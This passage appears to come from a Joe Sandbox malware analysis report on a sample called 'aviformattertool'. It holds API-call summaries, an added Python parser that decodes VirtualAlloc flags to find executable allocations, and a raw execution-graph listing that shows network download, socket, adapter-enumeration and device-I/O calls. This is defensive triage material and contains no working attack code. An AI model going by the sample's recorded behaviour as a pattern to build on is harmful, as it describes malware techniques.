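        print(f"{ref}: {label}")
        for n in notes:
            print("   ", n)
```

Run as-is, only the resource record is labelled for reversing; the VirtualAlloc record is flagged solely so the protection flag gets checked, and here both calls decode to PAGE_READWRITE (a 4 MB MEM_RESERVE followed by a 64 KB MEM_COMMIT), so no executable region is created at that site. To triage a full report, paste each "APIs" block as one string into RECORDS and extend RULES with the API families you want to silence or highlight.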

                                                                                                                                                          APIs
                                                                                                                                                          • HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032A0), ref: 00403B29
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032A0), ref: 00403B4D
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032A0), ref: 00403B67
                                                                                                                                                          • VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032A0), ref: 00403C28
                                                                                                                                                          • HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032A0), ref: 00403C3F
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocVirtual$FreeHeap
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 714016831-0
                                                                                                                                                          • Opcode ID: 6a0377e224db4ae02a06dd950b66bd3eac28a76e8822154944f4586344a6cd6a
                                                                                                                                                          • Instruction ID: 5b32f38fccd05926e46b045a885d3edb078ef3cc8d07faf24e937b41c291ab55
                                                                                                                                                          • Opcode Fuzzy Hash: 6a0377e224db4ae02a06dd950b66bd3eac28a76e8822154944f4586344a6cd6a
                                                                                                                                                          • Instruction Fuzzy Hash: A73112719447029BE3208F24DD05B22BBA8E74475AF00413AE166BB3D2E778B801874D
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%
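The five API bullets in the entry above follow a fixed text shape (`Api.MODULE(arg,…), ref: callsite`), and the numeric arguments are raw Win32 constants. The parser below is an added example, not code from the report or from Joe Sandbox. It takes those five lines verbatim plus one constructed VirtualAlloc line (ref 00DEAD00, not in the report) with PAGE_EXECUTE_READWRITE, and decodes the VirtualAlloc/VirtualFree/VirtualProtect flag slots: 00002000 is MEM_RESERVE, 00001000 is MEM_COMMIT, 00008000 is MEM_RELEASE, 00000004 is PAGE_READWRITE. Read that way, the function at 004032A0 reserves 4 MiB and commits 64 KiB read/write and releases it again, with no executable protection requested. One caveat built into the code: the report's argument list is the set of stack slots the static pass could resolve and does not always begin at the first formal parameter (the HeapAlloc entry at ref 004039B8 further down lists 00000008 and 000041C4, which read as HEAP_ZERO_MEMORY and a size with no heap handle before them), so flags are only decoded when every slot being indexed is resolved.

```python
"""Parse the "APIs" bullet lines of a Joe Sandbox function entry and decode
the Win32 memory constants passed to VirtualAlloc/VirtualFree/VirtualProtect.
Added example; not part of the report or of Joe Sandbox."""
import re
from dataclasses import dataclass, field

# The five bullets from the function entry above, plus one CONSTRUCTED line
# (ref 00DEAD00, not in the report) requesting PAGE_EXECUTE_READWRITE so the
# executable-memory check has something to fire on.
SAMPLE = """\
• HeapAlloc.KERNEL32(00000000,00002020,?,00000000,?,?,004032A0), ref: 00403B29
• VirtualAlloc.KERNEL32(00000000,00400000,00002000,00000004,?,00000000,?,?,004032A0), ref: 00403B4D
• VirtualAlloc.KERNEL32(00000000,00010000,00001000,00000004,?,00000000,?,?,004032A0), ref: 00403B67
• VirtualFree.KERNEL32(00000000,00000000,00008000,?,00000000,?,?,004032A0), ref: 00403C28
• HeapFree.KERNEL32(00000000,00000000,?,00000000,?,?,004032A0), ref: 00403C3F
• VirtualAlloc.KERNEL32(00000000,00001000,00003000,00000040), ref: 00DEAD00
"""

LINE = re.compile(r"•\s*(\w+)\.(\w+)\(([^)]*)\),\s*ref:\s*([0-9A-Fa-f]+)")

# winnt.h values; dict insertion order is the order names are printed.
ALLOC_TYPE = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE", 0x4000: "MEM_DECOMMIT",
              0x8000: "MEM_RELEASE", 0x80000: "MEM_RESET", 0x100000: "MEM_TOP_DOWN"}
PROTECT = {0x01: "PAGE_NOACCESS", 0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
           0x08: "PAGE_WRITECOPY", 0x10: "PAGE_EXECUTE", 0x20: "PAGE_EXECUTE_READ",
           0x40: "PAGE_EXECUTE_READWRITE", 0x80: "PAGE_EXECUTE_WRITECOPY"}
EXECUTE_BITS = 0xF0   # any PAGE_EXECUTE* protection


@dataclass
class ApiCall:
    api: str
    module: str
    args: list            # int per slot, None where the report printed '?'
    ref: int              # call-site address inside the dumped image
    decoded: dict = field(default_factory=dict)
    executable: bool = False


def decode_flags(value, table):
    """Render a bitmask as ORed constant names, or as hex if nothing matched."""
    names = [name for bit, name in table.items() if value & bit]
    return "|".join(names) if names else f"0x{value:x}"


def parse_api_lines(text):
    calls = []
    for m in LINE.finditer(text):
        api, module, raw, ref = m.groups()
        args = [None if a.strip() == "?" else int(a, 16)
                for a in raw.split(",") if a.strip()]
        call = ApiCall(api, module, args, int(ref, 16))
        # Decode by position only when every slot we index is resolved: the
        # report's list does not always start at the first formal parameter.
        if api == "VirtualAlloc" and len(args) >= 4 and None not in args[:4]:
            call.decoded = {"size": args[1],
                            "type": decode_flags(args[2], ALLOC_TYPE),
                            "protect": decode_flags(args[3], PROTECT)}
            call.executable = bool(args[3] & EXECUTE_BITS)
        elif api == "VirtualProtect" and len(args) >= 3 and None not in args[:3]:
            call.decoded = {"protect": decode_flags(args[2], PROTECT)}
            call.executable = bool(args[2] & EXECUTE_BITS)
        elif api == "VirtualFree" and len(args) >= 3 and None not in args[:3]:
            call.decoded = {"type": decode_flags(args[2], ALLOC_TYPE)}
        calls.append(call)
    return calls


def executable_allocations(calls):
    """Call sites that request executable memory: the first places to look
    when a sample is flagged for unpacking or rewriting its own PE header."""
    return [c.ref for c in calls if c.executable]


if __name__ == "__main__":
    parsed = parse_api_lines(SAMPLE)
    for c in parsed:
        print(f"{c.ref:08X} {c.api:<13} {c.decoded}")
    print("executable:", [f"{r:08X}" for r in executable_allocations(parsed)])
```

Feeding a whole report's "APIs" sections through `executable_allocations` gives the short list of call sites to inspect first for the unpacking behaviour listed in the overview; for this entry the list is empty, which matches a plain reserve-then-commit allocator.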

                                                                                                                                                          APIs
                                                                                                                                                          • GetCPInfo.KERNEL32(?,00000000), ref: 004056CA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Info
                                                                                                                                                          • String ID: $
                                                                                                                                                          • API String ID: 1807457897-3032137957
                                                                                                                                                          • Opcode ID: 2579351cbde8a2818a07d40e767e835ce1c24e1e9af255249c9fbcd564bc5834
                                                                                                                                                          • Instruction ID: 364ad7a5ee0565adc1119f8b40c781a5b07f5a98c0ad1d73c90734a45d6efa61
                                                                                                                                                          • Opcode Fuzzy Hash: 2579351cbde8a2818a07d40e767e835ce1c24e1e9af255249c9fbcd564bc5834
                                                                                                                                                          • Instruction Fuzzy Hash: F24126314047586AEB119628DD49BFB7FA8EB02704F1404F6ED46F71D2C2794928EFAB
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          APIs
                                                                                                                                                          • HeapReAlloc.KERNEL32(00000000,00000050,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 00403984
                                                                                                                                                          • HeapAlloc.KERNEL32(00000008,000041C4,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039B8
                                                                                                                                                          • VirtualAlloc.KERNEL32(00000000,00100000,00002000,00000004,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039D2
                                                                                                                                                          • HeapFree.KERNEL32(00000000,?,?,00000000,00403724,?,?,?,00000100,?,00000000), ref: 004039E9
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 00000002.00000002.1663172957.0000000000400000.00000040.00000001.01000000.00000008.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000002.00000002.1663172957.0000000000409000.00000040.00000001.01000000.00000008.sdmp
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_2_2_400000_aviformattertool.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: AllocHeap$FreeVirtual
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3499195154-0
                                                                                                                                                          • Opcode ID: 5445ee1769e2b4dfc8a7df9410455d6395cf6e66bb57eb1db49a90ecc10dc223
                                                                                                                                                          • Instruction ID: a42712acd455d35c8afd215c706735e8fa7757c2ad65ecbc9136afbab992c5c7
                                                                                                                                                          • Opcode Fuzzy Hash: 5445ee1769e2b4dfc8a7df9410455d6395cf6e66bb57eb1db49a90ecc10dc223
                                                                                                                                                          • Instruction Fuzzy Hash: 59114C702003019FD7308F19EE4A9227BB9FB847617154A3AF192E71F0D7729961DF19
                                                                                                                                                          Uniqueness

                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                          Execution Graph

                                                                                                                                                          Execution Coverage:10.2%
                                                                                                                                                          Dynamic/Decrypted Code Coverage:84.9%
                                                                                                                                                          Signature Coverage:1.3%
                                                                                                                                                          Total number of Nodes:2000
                                                                                                                                                          Total number of Limit Nodes:32
[Execution graph listing: the interactive graph widget was flattened into one run of `id address [API names]` node tokens and `id->id` edge tokens and is not reproduced here. What it shows: the entry chain starts at node 17557 (402f22, GetVersion) with HeapCreate at 40325a, then GetCommandLineA at 402f96, GetStartupInfoA at 402fba and GetModuleHandleA at 402fcc; raw-device I/O at 2a1f823 and 401a4f (CreateFileA, DeviceIoControl, GetLastError, FindCloseChangeNotification); adapter enumeration at 2a1f927 and 401b4b (LoadLibraryA, GetProcAddress, GetAdaptersInfo, FreeLibrary); WSAStartup at 2a11ac5; WriteFile at 2aad845 and 2a4ebd3; VirtualAlloc at 40b16c; and CRT startup and error-handling paths (IsDebuggerPresent, SetUnhandledExceptionFilter, RtlEncodePointer/RtlDecodePointer, TlsGetValue, TerminateProcess). The listing is cut off at node 18317 in this copy.]
2a303a2 GetLastError 18316->18317 18317->18318 18318->18295 18319->18295 18323 2a289d7 RtlLeaveCriticalSection 18320->18323 18322 2a2326b 18322->18268 18323->18322 18324 2a17bd4 18325 2a17be5 18324->18325 18359 2a16745 __setmbcp_nolock 18324->18359 18326 2a22ef4 59 API calls _free 18326->18359 18328 2a16759 Sleep 18329 2a1675f RtlEnterCriticalSection RtlLeaveCriticalSection 18328->18329 18329->18359 18330 2a172fc InternetOpenA 18331 2a1731a InternetSetOptionA InternetSetOptionA InternetSetOptionA 18330->18331 18330->18359 18336 2a17393 __setmbcp_nolock 18331->18336 18332 2a17373 InternetOpenUrlA 18333 2a173d3 InternetCloseHandle 18332->18333 18332->18336 18333->18359 18334 2a17397 InternetReadFile 18335 2a173c8 InternetCloseHandle 18334->18335 18334->18336 18335->18333 18336->18332 18336->18334 18337 2a1743a RtlEnterCriticalSection RtlLeaveCriticalSection 18368 2a222bc 18337->18368 18339 2a222bc 66 API calls 18339->18359 18340 2a22f2c _malloc 59 API calls 18341 2a174ee RtlEnterCriticalSection RtlLeaveCriticalSection 18340->18341 18341->18359 18342 2a177bb RtlEnterCriticalSection RtlLeaveCriticalSection 18342->18359 18345 2a17933 RtlEnterCriticalSection 18346 2a17960 RtlLeaveCriticalSection 18345->18346 18345->18359 18439 2a13c67 18346->18439 18348 2a22f2c 59 API calls _malloc 18348->18359 18352 2a23acc _Allocate 60 API calls 18352->18359 18358 2a23566 60 API calls _strtok 18358->18359 18359->18326 18359->18328 18359->18329 18359->18330 18359->18337 18359->18339 18359->18340 18359->18342 18359->18345 18359->18346 18359->18348 18359->18352 18359->18358 18359->18359 18360 2a1a6a5 73 API calls 18359->18360 18364 2a1773d Sleep 18359->18364 18366 2a17738 shared_ptr 18359->18366 18378 2a1a7cf 18359->18378 18382 2a151ab 18359->18382 18411 2a1ab8f 18359->18411 18421 2a22398 18359->18421 18430 2a11ba7 18359->18430 18446 2a13d7e 18359->18446 18453 2a182bb 18359->18453 18459 2a1d097 18359->18459 18464 2a1836a 18359->18464 18472 2a133b2 18359->18472 18479 2a227d0 18359->18479 
18482 2a196b7 18359->18482 18497 2a18f83 18359->18497 18504 2a153df 18359->18504 18360->18359 18489 2a21870 18364->18489 18366->18359 18366->18364 18493 2a14100 18366->18493 18369 2a222eb 18368->18369 18370 2a222c8 18368->18370 18514 2a22303 18369->18514 18370->18369 18372 2a222ce 18370->18372 18374 2a25ddb strtoxl 59 API calls 18372->18374 18373 2a222fe 18373->18359 18375 2a222d3 18374->18375 18376 2a24e75 strtoxl 9 API calls 18375->18376 18377 2a222de 18376->18377 18377->18359 18379 2a1a7d9 __EH_prolog 18378->18379 18822 2a1df80 18379->18822 18381 2a1a7f7 shared_ptr 18381->18359 18383 2a151b5 __EH_prolog 18382->18383 18826 2a20a90 18383->18826 18386 2a13c67 72 API calls 18387 2a151dc 18386->18387 18388 2a13d7e 64 API calls 18387->18388 18389 2a151ea 18388->18389 18390 2a182bb 89 API calls 18389->18390 18391 2a151fe 18390->18391 18392 2a153b4 shared_ptr 18391->18392 18830 2a1a6a5 18391->18830 18392->18359 18395 2a15256 18397 2a1a6a5 73 API calls 18395->18397 18396 2a15288 18398 2a1a6a5 73 API calls 18396->18398 18400 2a15266 18397->18400 18399 2a15299 18398->18399 18399->18392 18401 2a1a6a5 73 API calls 18399->18401 18400->18392 18403 2a1a6a5 73 API calls 18400->18403 18402 2a152dc 18401->18402 18402->18392 18405 2a1a6a5 73 API calls 18402->18405 18404 2a15346 18403->18404 18404->18392 18406 2a1a6a5 73 API calls 18404->18406 18405->18400 18407 2a1536c 18406->18407 18407->18392 18408 2a1a6a5 73 API calls 18407->18408 18409 2a15396 18408->18409 18835 2a1ce59 18409->18835 18412 2a1ab99 __EH_prolog 18411->18412 18886 2a1d06e 18412->18886 18414 2a1abba shared_ptr 18889 2a22070 18414->18889 18416 2a1abd1 18417 2a1abe7 18416->18417 18895 2a13fb0 18416->18895 18417->18359 18422 2a223b4 18421->18422 18423 2a223c9 18421->18423 18424 2a25ddb strtoxl 59 API calls 18422->18424 18423->18422 18427 2a223d0 18423->18427 18425 2a223b9 18424->18425 18426 2a24e75 strtoxl 9 API calls 18425->18426 18428 2a223c4 18426->18428 18427->18428 19386 2a25e81 18427->19386 18428->18359 19587 
2a35370 18430->19587 18432 2a11bb1 RtlEnterCriticalSection 18433 2a11be9 RtlLeaveCriticalSection 18432->18433 18435 2a11bd1 18432->18435 19588 2a1e2b0 18433->19588 18435->18433 18436 2a11c55 RtlLeaveCriticalSection 18435->18436 18436->18359 18437 2a11c22 18437->18436 18440 2a20a90 Mailbox 68 API calls 18439->18440 18441 2a13c7e 18440->18441 19670 2a13ca2 18441->19670 18447 2a13d99 htons 18446->18447 18448 2a13dcb htons 18446->18448 19697 2a13bd3 18447->19697 19703 2a13c16 18448->19703 18452 2a13ded 18452->18359 18454 2a182d3 18453->18454 18457 2a182f4 18453->18457 19734 2a1957d 18454->19734 18458 2a18319 18457->18458 19737 2a12ac7 18457->19737 18458->18359 18460 2a20a90 Mailbox 68 API calls 18459->18460 18462 2a1d0ad 18460->18462 18461 2a1d19b 18461->18359 18462->18461 18463 2a12db5 73 API calls 18462->18463 18463->18462 18465 2a18385 WSASetLastError shutdown 18464->18465 18466 2a18375 18464->18466 18468 2a1a489 69 API calls 18465->18468 18467 2a20a90 Mailbox 68 API calls 18466->18467 18469 2a1837a 18467->18469 18470 2a183a2 18468->18470 18469->18359 18470->18469 18471 2a20a90 Mailbox 68 API calls 18470->18471 18471->18469 18473 2a133e1 18472->18473 18474 2a133c4 InterlockedCompareExchange 18472->18474 18476 2a129ee 76 API calls 18473->18476 18474->18473 18475 2a133d6 18474->18475 19831 2a132ab 18475->19831 18478 2a133f1 18476->18478 18478->18359 19884 2a227ee 18479->19884 18481 2a227e9 18481->18359 18483 2a196c1 __EH_prolog 18482->18483 18484 2a11ba7 210 API calls 18483->18484 18485 2a19716 18484->18485 18486 2a19733 RtlEnterCriticalSection 18485->18486 18487 2a19751 RtlLeaveCriticalSection 18486->18487 18488 2a1974e 18486->18488 18487->18359 18488->18487 18490 2a218a1 18489->18490 18491 2a2187d 18489->18491 18490->18366 18491->18490 18492 2a21891 GetProcessHeap HeapFree 18491->18492 18492->18490 18494 2a14112 18493->18494 18495 2a14118 18493->18495 19890 2a1a683 18494->19890 18495->18366 18498 2a18f8d __EH_prolog 18497->18498 19892 2a1373f 18498->19892 18500 
2a18fa7 RtlEnterCriticalSection 18501 2a18fb6 RtlLeaveCriticalSection 18500->18501 18503 2a18ff0 18501->18503 18503->18359 18505 2a22f2c _malloc 59 API calls 18504->18505 18506 2a153f4 SHGetSpecialFolderPathA 18505->18506 18507 2a1540a 18506->18507 18507->18507 19901 2a236f1 18507->19901 18510 2a15474 18510->18359 18512 2a1546e 19917 2a23a04 18512->19917 18524 2a221fb 18514->18524 18517 2a22325 18518 2a25ddb strtoxl 59 API calls 18517->18518 18519 2a2232a 18518->18519 18520 2a24e75 strtoxl 9 API calls 18519->18520 18521 2a22335 ___ascii_stricmp 18520->18521 18521->18373 18522 2a258fa 66 API calls __tolower_l 18523 2a2233c 18522->18523 18523->18521 18523->18522 18525 2a2220c 18524->18525 18531 2a22259 18524->18531 18532 2a25bda 18525->18532 18528 2a22239 18528->18531 18552 2a254c1 18528->18552 18531->18517 18531->18523 18533 2a25bf2 __getptd_noexit 59 API calls 18532->18533 18534 2a25be0 18533->18534 18535 2a283bf __amsg_exit 59 API calls 18534->18535 18536 2a22212 18534->18536 18535->18536 18536->18528 18537 2a2513f 18536->18537 18538 2a2514b __setmbcp 18537->18538 18539 2a25bda __setmbcp 59 API calls 18538->18539 18540 2a25154 18539->18540 18541 2a25183 18540->18541 18542 2a25167 18540->18542 18543 2a2886d __lock 59 API calls 18541->18543 18544 2a25bda __setmbcp 59 API calls 18542->18544 18545 2a2518a 18543->18545 18546 2a2516c 18544->18546 18564 2a251bf 18545->18564 18550 2a2517a __setmbcp 18546->18550 18551 2a283bf __amsg_exit 59 API calls 18546->18551 18550->18528 18551->18550 18553 2a254cd __setmbcp 18552->18553 18554 2a25bda __setmbcp 59 API calls 18553->18554 18555 2a254d7 18554->18555 18556 2a2886d __lock 59 API calls 18555->18556 18561 2a254e9 18555->18561 18562 2a25507 18556->18562 18557 2a25534 18818 2a2555e 18557->18818 18558 2a283bf __amsg_exit 59 API calls 18560 2a254f7 __setmbcp 18558->18560 18560->18531 18561->18558 18561->18560 18562->18557 18563 2a22ef4 _free 59 API calls 18562->18563 18563->18557 18565 2a251ca ___addlocaleref ___removelocaleref 
18564->18565 18567 2a2519e 18564->18567 18565->18567 18571 2a24f45 18565->18571 18568 2a251b6 18567->18568 18817 2a289d7 RtlLeaveCriticalSection 18568->18817 18570 2a251bd 18570->18546 18572 2a24fbe 18571->18572 18574 2a24f5a 18571->18574 18573 2a2500b 18572->18573 18575 2a22ef4 _free 59 API calls 18572->18575 18580 2a25034 18573->18580 18641 2a2d4bd 18573->18641 18574->18572 18582 2a22ef4 _free 59 API calls 18574->18582 18584 2a24f8b 18574->18584 18577 2a24fdf 18575->18577 18579 2a22ef4 _free 59 API calls 18577->18579 18585 2a24ff2 18579->18585 18583 2a25093 18580->18583 18599 2a22ef4 59 API calls _free 18580->18599 18581 2a22ef4 _free 59 API calls 18581->18580 18588 2a24f80 18582->18588 18589 2a22ef4 _free 59 API calls 18583->18589 18590 2a22ef4 _free 59 API calls 18584->18590 18600 2a24fa9 18584->18600 18591 2a22ef4 _free 59 API calls 18585->18591 18586 2a22ef4 _free 59 API calls 18587 2a24fb3 18586->18587 18592 2a22ef4 _free 59 API calls 18587->18592 18601 2a2d35a 18588->18601 18594 2a25099 18589->18594 18595 2a24f9e 18590->18595 18596 2a25000 18591->18596 18592->18572 18594->18567 18629 2a2d456 18595->18629 18598 2a22ef4 _free 59 API calls 18596->18598 18598->18573 18599->18580 18600->18586 18602 2a2d369 18601->18602 18628 2a2d452 18601->18628 18603 2a22ef4 _free 59 API calls 18602->18603 18604 2a2d37a 18602->18604 18603->18604 18605 2a2d38c 18604->18605 18607 2a22ef4 _free 59 API calls 18604->18607 18606 2a2d39e 18605->18606 18608 2a22ef4 _free 59 API calls 18605->18608 18609 2a2d3b0 18606->18609 18610 2a22ef4 _free 59 API calls 18606->18610 18607->18605 18608->18606 18611 2a2d3c2 18609->18611 18612 2a22ef4 _free 59 API calls 18609->18612 18610->18609 18613 2a2d3d4 18611->18613 18615 2a22ef4 _free 59 API calls 18611->18615 18612->18611 18614 2a2d3e6 18613->18614 18616 2a22ef4 _free 59 API calls 18613->18616 18617 2a2d3f8 18614->18617 18618 2a22ef4 _free 59 API calls 18614->18618 18615->18613 18616->18614 18619 2a2d40a 18617->18619 18620 2a22ef4 _free 59 API 
calls 18617->18620 18618->18617 18621 2a2d41c 18619->18621 18623 2a22ef4 _free 59 API calls 18619->18623 18620->18619 18622 2a2d42e 18621->18622 18624 2a22ef4 _free 59 API calls 18621->18624 18625 2a2d440 18622->18625 18626 2a22ef4 _free 59 API calls 18622->18626 18623->18621 18624->18622 18627 2a22ef4 _free 59 API calls 18625->18627 18625->18628 18626->18625 18627->18628 18628->18584 18630 2a2d461 18629->18630 18640 2a2d4b9 18629->18640 18632 2a2d471 18630->18632 18633 2a22ef4 _free 59 API calls 18630->18633 18631 2a2d483 18635 2a2d495 18631->18635 18636 2a22ef4 _free 59 API calls 18631->18636 18632->18631 18634 2a22ef4 _free 59 API calls 18632->18634 18633->18632 18634->18631 18637 2a2d4a7 18635->18637 18638 2a22ef4 _free 59 API calls 18635->18638 18636->18635 18639 2a22ef4 _free 59 API calls 18637->18639 18637->18640 18638->18637 18639->18640 18640->18600 18642 2a2d4cc 18641->18642 18816 2a25029 18641->18816 18643 2a22ef4 _free 59 API calls 18642->18643 18644 2a2d4d4 18643->18644 18645 2a22ef4 _free 59 API calls 18644->18645 18646 2a2d4dc 18645->18646 18647 2a22ef4 _free 59 API calls 18646->18647 18648 2a2d4e4 18647->18648 18649 2a22ef4 _free 59 API calls 18648->18649 18650 2a2d4ec 18649->18650 18651 2a22ef4 _free 59 API calls 18650->18651 18652 2a2d4f4 18651->18652 18653 2a22ef4 _free 59 API calls 18652->18653 18654 2a2d4fc 18653->18654 18655 2a22ef4 _free 59 API calls 18654->18655 18656 2a2d503 18655->18656 18657 2a22ef4 _free 59 API calls 18656->18657 18658 2a2d50b 18657->18658 18659 2a22ef4 _free 59 API calls 18658->18659 18660 2a2d513 18659->18660 18661 2a22ef4 _free 59 API calls 18660->18661 18816->18581 18817->18570 18821 2a289d7 RtlLeaveCriticalSection 18818->18821 18820 2a25565 18820->18561 18821->18820 18823 2a1df8a __EH_prolog 18822->18823 18824 2a23acc _Allocate 60 API calls 18823->18824 18825 2a1dfa1 18824->18825 18825->18381 18827 2a151cf 18826->18827 18828 2a20ab9 18826->18828 18827->18386 18829 2a23324 __cinit 68 API calls 18828->18829 
18829->18827 18831 2a20a90 Mailbox 68 API calls 18830->18831 18832 2a1a6bf 18831->18832 18833 2a1522f 18832->18833 18840 2a12db5 18832->18840 18833->18392 18833->18395 18833->18396 18836 2a20a90 Mailbox 68 API calls 18835->18836 18838 2a1ce73 18836->18838 18837 2a1cf82 18837->18392 18838->18837 18867 2a12b95 18838->18867 18841 2a12de4 18840->18841 18842 2a12dca 18840->18842 18844 2a12dfc 18841->18844 18845 2a12def 18841->18845 18843 2a20a90 Mailbox 68 API calls 18842->18843 18847 2a12dcf 18843->18847 18854 2a12d39 WSASetLastError WSASend 18844->18854 18848 2a20a90 Mailbox 68 API calls 18845->18848 18847->18832 18848->18847 18849 2a12e0c 18849->18847 18850 2a12e54 WSASetLastError select 18849->18850 18852 2a20a90 68 API calls Mailbox 18849->18852 18853 2a12d39 71 API calls 18849->18853 18864 2a1a489 18850->18864 18852->18849 18853->18849 18855 2a1a489 69 API calls 18854->18855 18856 2a12d6e 18855->18856 18857 2a12d75 18856->18857 18859 2a12d82 18856->18859 18858 2a20a90 Mailbox 68 API calls 18857->18858 18861 2a12d7a 18858->18861 18860 2a20a90 Mailbox 68 API calls 18859->18860 18859->18861 18860->18861 18862 2a12d9c 18861->18862 18863 2a20a90 Mailbox 68 API calls 18861->18863 18862->18849 18863->18862 18865 2a20a90 Mailbox 68 API calls 18864->18865 18866 2a1a495 WSAGetLastError 18865->18866 18866->18849 18868 2a12bb1 18867->18868 18869 2a12bc7 18867->18869 18870 2a20a90 Mailbox 68 API calls 18868->18870 18871 2a12bd2 18869->18871 18881 2a12bdf 18869->18881 18875 2a12bb6 18870->18875 18873 2a20a90 Mailbox 68 API calls 18871->18873 18872 2a12be2 WSASetLastError WSARecv 18874 2a1a489 69 API calls 18872->18874 18873->18875 18874->18881 18875->18838 18876 2a20a90 68 API calls Mailbox 18876->18881 18877 2a12d22 18882 2a11996 18877->18882 18879 2a12cbc WSASetLastError select 18880 2a1a489 69 API calls 18879->18880 18880->18881 18881->18872 18881->18875 18881->18876 18881->18877 18881->18879 18883 2a119bb 18882->18883 18884 2a1199f 18882->18884 18883->18875 18885 2a23324 
__cinit 68 API calls 18884->18885 18885->18883 18908 2a1e200 18886->18908 18888 2a1d080 18888->18414 18990 2a23339 18889->18990 18892 2a22094 18892->18416 18893 2a220bd ResumeThread 18893->18416 18894 2a220b6 CloseHandle 18894->18893 18896 2a20a90 Mailbox 68 API calls 18895->18896 18897 2a13fb8 18896->18897 19357 2a11815 18897->19357 18900 2a1a60b 18901 2a1a615 __EH_prolog 18900->18901 19363 2a1cbc3 18901->19363 18909 2a1e20a __EH_prolog 18908->18909 18914 2a14030 18909->18914 18913 2a1e238 18913->18888 18926 2a35370 18914->18926 18916 2a1403a GetProcessHeap RtlAllocateHeap 18917 2a14053 std::exception::exception 18916->18917 18918 2a1407c 18916->18918 18927 2a1a64a 18917->18927 18918->18913 18920 2a1408a 18918->18920 18921 2a14094 __EH_prolog 18920->18921 18971 2a1a269 18921->18971 18926->18916 18928 2a1a654 __EH_prolog 18927->18928 18935 2a1cbf9 18928->18935 18933 2a244da __CxxThrowException@8 RaiseException 18934 2a1a682 18933->18934 18941 2a1d759 18935->18941 18938 2a1cc13 18963 2a1d791 18938->18963 18940 2a1a671 18940->18933 18944 2a22493 18941->18944 18947 2a224c1 18944->18947 18948 2a224cf 18947->18948 18952 2a1a663 18947->18952 18953 2a22557 18948->18953 18952->18938 18954 2a22560 18953->18954 18955 2a224d4 18953->18955 18956 2a22ef4 _free 59 API calls 18954->18956 18955->18952 18957 2a22519 18955->18957 18956->18955 18958 2a22525 _strlen 18957->18958 18961 2a2254a 18957->18961 18959 2a22f2c _malloc 59 API calls 18958->18959 18960 2a22537 18959->18960 18960->18961 18962 2a26c3c __setenvp 59 API calls 18960->18962 18961->18952 18962->18961 18964 2a1d79b __EH_prolog 18963->18964 18967 2a1b6bc 18964->18967 18966 2a1d7d2 Mailbox 18966->18940 18968 2a1b6c6 __EH_prolog 18967->18968 18969 2a22493 std::exception::exception 59 API calls 18968->18969 18970 2a1b6d7 Mailbox 18969->18970 18970->18966 18982 2a1b080 18971->18982 18974 2a13fdc 18989 2a35370 18974->18989 18976 2a13fe6 CreateEventA 18977 2a13ffd 18976->18977 18978 2a1400f 18976->18978 18979 2a13fb0 Mailbox 
68 API calls 18977->18979 18978->18913 18980 2a14005 18979->18980 18981 2a1a60b Mailbox 60 API calls 18980->18981 18981->18978 18983 2a140c1 18982->18983 18984 2a1b08c 18982->18984 18983->18974 18985 2a23acc _Allocate 60 API calls 18984->18985 18986 2a1b09c std::exception::exception 18984->18986 18985->18986 18986->18983 18987 2a244da __CxxThrowException@8 RaiseException 18986->18987 18988 2a1fab1 18987->18988 18989->18976 18991 2a23347 18990->18991 18992 2a2335b 18990->18992 18993 2a25ddb strtoxl 59 API calls 18991->18993 18994 2a289ec __calloc_crt 59 API calls 18992->18994 18995 2a2334c 18993->18995 18996 2a23368 18994->18996 18997 2a24e75 strtoxl 9 API calls 18995->18997 18998 2a233b9 18996->18998 19000 2a25bda __setmbcp 59 API calls 18996->19000 19003 2a2208b 18997->19003 18999 2a22ef4 _free 59 API calls 18998->18999 19001 2a233bf 18999->19001 19002 2a23375 19000->19002 19001->19003 19009 2a25dba 19001->19009 19004 2a25c61 __initptd 59 API calls 19002->19004 19003->18892 19003->18893 19003->18894 19005 2a2337e CreateThread 19004->19005 19005->19003 19008 2a233b1 GetLastError 19005->19008 19017 2a23499 19005->19017 19008->18998 19014 2a25da7 19009->19014 19011 2a25dc3 __dosmaperr 19012 2a25ddb strtoxl 59 API calls 19011->19012 19013 2a25dd6 19012->19013 19013->19003 19015 2a25bf2 __getptd_noexit 59 API calls 19014->19015 19016 2a25dac 19015->19016 19016->19011 19018 2a234a2 __threadstartex@4 19017->19018 19019 2a2914b __getptd_noexit TlsGetValue 19018->19019 19020 2a234a8 